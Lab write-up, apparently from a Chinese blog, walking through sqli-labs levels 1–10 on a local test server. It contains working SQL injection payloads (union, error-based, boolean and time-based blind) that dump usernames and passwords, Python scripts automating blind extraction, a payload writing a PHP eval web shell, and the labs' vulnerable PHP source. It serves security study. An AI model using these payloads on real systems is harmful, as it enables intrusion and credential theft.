Less - 1:

页面:

URL:

http://127.0.0.1/sqli-labs-master/Less-1/

测试:

1.回显正常,说明不是数字型注入,

http://127.0.0.1/sqli-labs-master/Less-1/?id=1

2.回显报错,说明是字符型注入,

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'

3.回显正常,单引号闭合成功,通过单引号闭合进行注入,

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' or '1'='1

4.通过逐个测试,得出字段数为3,进行联合注入,

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3--+

//回显正常

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4--+

//报错:"Unknown column '4' in 'order clause'"

5.

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+

//得到可以回显的字段:2,3字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3 --+

//得到数据库名为security

6.查看所有数据库名,

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,

(select group_concat(schema_name) from information_schema.schemata),3 --+

7.查看security库内的所有表名,

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,

(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

8.爆出所有列名,以users为例,

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,

(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

9.爆破用户名和密码,

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,

(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

补充:

查数据库名:select database()

information_schema.tables:存储mysql数据库下面的所有表名信息的表

table_schema:数据库名

table_name:表名

column_name:列名

information_schema.columns :存储mysql数据库下面的所有列名信息的表

table_name:表名

Less - 2:

页面:

测试:

1.测试发现属于数字型注入,不需要进行闭合,直接进行注入

2.payload:

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,3
其他步骤同Less-1

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

Less - 3:

页面:

测试:

单引号与括号闭合

http://127.0.0.1/sqli-labs-master/Less-3/?id=1

//回显正常

http://127.0.0.1/sqli-labs-master/Less-3/?id=1'

//You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+

//回显正常

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity 

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

Less - 4:

测试:

双引号和括号闭合

http://127.0.0.1/sqli-labs-master/Less-4/?id=1") --+
//闭合成功

http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3--+
//进行联合注入

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity 

$id = '"' . $id . '"';

$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

Less - 5:

测试:

1.

http://127.0.0.1/sqli-labs-master/Less-5/?id=1

//回显:You are in..........

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'

//回显:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

2.

法一:通过updatexml报错注入:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select database())),1))%23

法二:通过floor报错注入:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

③爆破表名

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

④爆破列名

http://127.0.0.1/sqli-labs-master/Less-5?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 7,1),floor(rand()*2))as a from information_schema.tables group by a%23

⑤爆破username,password

http://127.0.0.1/sqli-labs-master/Less-5?id=1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity 

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

Less - 6:

测试:

方法同Less-5,不同之处为双引号。

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity 

$id = '"'.$id.'"';

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

Less - 7:

页面:

http://127.0.0.1/sqli-labs-master/Less-7?id=1

测试:

1.

http://127.0.0.1/sqli-labs-master/Less-7?id=1')) --+

//回显正常

2.写入文件

http://127.0.0.1/sqli-labs-master/Less-7?id=1')) union select 1,2,'<?PHP eval($_GET["s1mpL3"])?>' into outfile "E:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\7.php" %23

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity 

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

Less - 8:

待更新.......

测试:

1.

http://127.0.0.1/sqli-labs-master/Less-8?id=1

有回显

http://127.0.0.1/sqli-labs-master/Less-8?id=1'

无回显,通过基于Bool的盲注。

2.

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,1,1))) = 115--+

3.判断数据库名长度(依次测试)

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length(database())) = 8 --+

4.盲注得出数据库名security

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,1,1))) = 115 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,2,1))) = 101 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,3,1))) = 99 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,4,1))) = 117 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,5,1))) = 114 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,6,1))) = 105 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,7,1))) = 116 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select database()) ,8,1))) = 121 --+

5.判断表名长度,

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

6.表4为user,

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+

http://127.0.0.1/sqli-labs-master/Less-8?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity 

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

Less - 9:

测试:

1.确定为基于时间的注入

http://127.0.0.1/sqli-labs-master/Less-9?id=1' and if(1=1,sleep(5),null) --+

2.判断数据库长度

http://127.0.0.1/sqli-labs-master/Less-9?

id=1' and if(substr(database(),1,1)='s',sleep(5),1)--+

3.判断库名

http://127.0.0.1/sqli-labs-master/Less-9?

id=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(5), null) --+

参考:

脚本1:

# -*- coding: utf-8 -*-

import requests

import time

url = 'http://127.0.0.1/sqli/Less-8/?id=1'

def check(payload):

    url_new = url + payload

    time_start = time.time()

    content = requests.get(url=url_new)

    time_end = time.time()

    if time_end - time_start >5:

        return 1

result  = ''

s = r'0123456789abcdefghijklmnopqrstuvwxyz'

for i in xrange(1,100):

    for c in s:

        payload = "'and if(substr(database(),%d,1)='%c',sleep(5),1)--+" % (i,c)

        if check(payload):

            result += c

            break

    print result

脚本2:

# -*- coding: utf-8 -*-

import requests

import time

url = 'http://127.0.0.1/sqli/Less-8/?id=1'

def check(payload):

    url_new = url + payload

    time_start = time.time()

    content = requests.get(url=url_new)

    time_end = time.time()

    if time_end - time_start >5:

        return 1

result  = ''

panduan = ''

ll=0

s = r'0123456789abcdefghijklmnopqrstuvwxyz'

for i in xrange(1,100):

    for c in s:

        payload = "'and if(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),%d,1)='%c',sleep(5),1)--+" % (i,c)

        if check(payload):

            result += c

            break

    if ll==len(result):

        print 'table_name:  '+result

        end = raw_input('-------------')

    ll = len(result)

    print result

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity 

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

Less - 10:

测试:

同Less-9,不同之处是双引号。

源码:

<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity 

$id = '"'.$id.'"';

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

参考:

https://www.cnblogs.com/-qing-/p/11610385.html#_label0

http://p0desta.com/2018/01/28/Sqli_labs%E9%80%9A%E5%85%B3%E6%96%87%E6%A1%A3/

Sqli - Labs 靶场笔记(一)的更多相关文章

  1. XSS - Labs 靶场笔记(下)

    Less - 11: 1.观察界面和源代码可知,依旧是隐藏表单 2.突破点是 $str11=$_SERVER['HTTP_REFERER']; (本题为HTTP头REFERER注入) 3.因此构造pa ...

  2. XSS - Labs 靶场笔记(上)

    上周在网上看到的一个XSS平台,刷一波<doge Less - 1: 1.进入主界面,由图二可知是GET请求,提交name=test,回显在页面 2.查看源代码可知 没有做任何过滤,显然存在反射 ...

  3. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  4. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  5. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  6. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  7. sqli-labs 靶场笔记

    sqli-labs 靶场笔记 冲冲冲,好好学习 2020年1月12号 先来点铺垫 分类: 按照请求方法分类: 1.Get型注入:注入参数在get的参数里. 2.POST型注入:注入参数在POST的参数 ...

  8. (未完)经典Web漏洞实战演练靶场笔记

    记录下自己写的经典Web漏洞靶场的write up,包括了大部分的经典Web漏洞实战场景,做个笔记. 0x01 任意文件下载漏洞 if(!empty($_GET['filename'])){ $fil ...

  9. CSRF漏洞实战靶场笔记

    记录下自己写的CSRF漏洞靶场的write up,包括了大部分的CSRF实战场景,做个笔记. 0x01 无防护GET类型csrf(伪造添加成员请求) 这一关没有任何csrf访问措施 首先我们登录tes ...

随机推荐

  1. 自顶向下redis4.0(5)持久化

    redis4.0的持久化 目录 redis4.0的持久化 简介 正文 rdb持久化 save命令 bgsave命令 rdb定期保存数据 进程结束保存数据 aof持久化 数据缓冲区 刷新数据到磁盘 ap ...

  2. 如何push一个docker镜像到DockerHub上

    在DockerHub上创建账号:https://hub.docker.com/ 这里我的账号是firewarm 本地下载镜像(这里拿alpine做示例),并为镜像打tag [root@host-30 ...

  3. 处理fMRI数据的一些常用Matlab命令

    背景 处理fMRI数据常常用到MATLAB,在此记录一些常用代码及功能. 1.读取原始DICOM数据 1-1 读入dicom图像并绘图: Image = dicomread('fMRI.dcm'); ...

  4. 职场PUA,管理者的五宗罪

    在目前的社会环境下,程序员似乎成了"弱势群体".我们经常谈论的职场PUA已经成为程序员的代名词. 我一直在想,为什么这么多管理者能力会这么差. 但最后最吃亏的还是可怜的程序员. 也 ...

  5. github无法访问解决方法

    windows 系统下找到目录 C:\Windows\System32\drivers\etc 打开 hosts 文件 添加以下配置 #github140.82.114.3 github.com 保存 ...

  6. MVC 微信网页授权 获取 OpenId

    最近开发微信公众平台,做下记录,以前也开发过,这次开发又给忘了,搞了半天,还是做个笔记为好. 注意框架为MVC 开发微信公众平台.场景为,在模板页中获取用户openid,想要进行验证的页面,集成模板页 ...

  7. CSS系列 (03):CSS三大特性

    层叠性 层叠性指的是样式的优先级,当产生冲突时以优先级高的为准,优先级相同时取后面定义的属性样式. 继承性 继承性指的是子孙元素可以继承父元素的属性. 记录一下开发中常用的继承属性: 字体系列 fon ...

  8. 使用@Param注解

    1,使用@Param注解 当以下面的方式进行写SQL语句时: @Select("select column from table where userid = #{userid} " ...

  9. 在wildfly 21中搭建cluster集群

    目录 简介 下载软件和相关组件 配置domain 创建应用程序 部署应用程序 集群配置 总结 简介 wildfly是一个非常强大的工具,我们可以轻松的使用wildfly部署应用程序,更为强大的是,wi ...

  10. [LeetCode]60. Permutation Sequence求全排列第k个

    /* n个数有n!个排列,第k个排列,是以第(k-1)/(n-1)!个数开头的集合中第(k-1)%(n-1)!个数 */ public String getPermutation(int n, int ...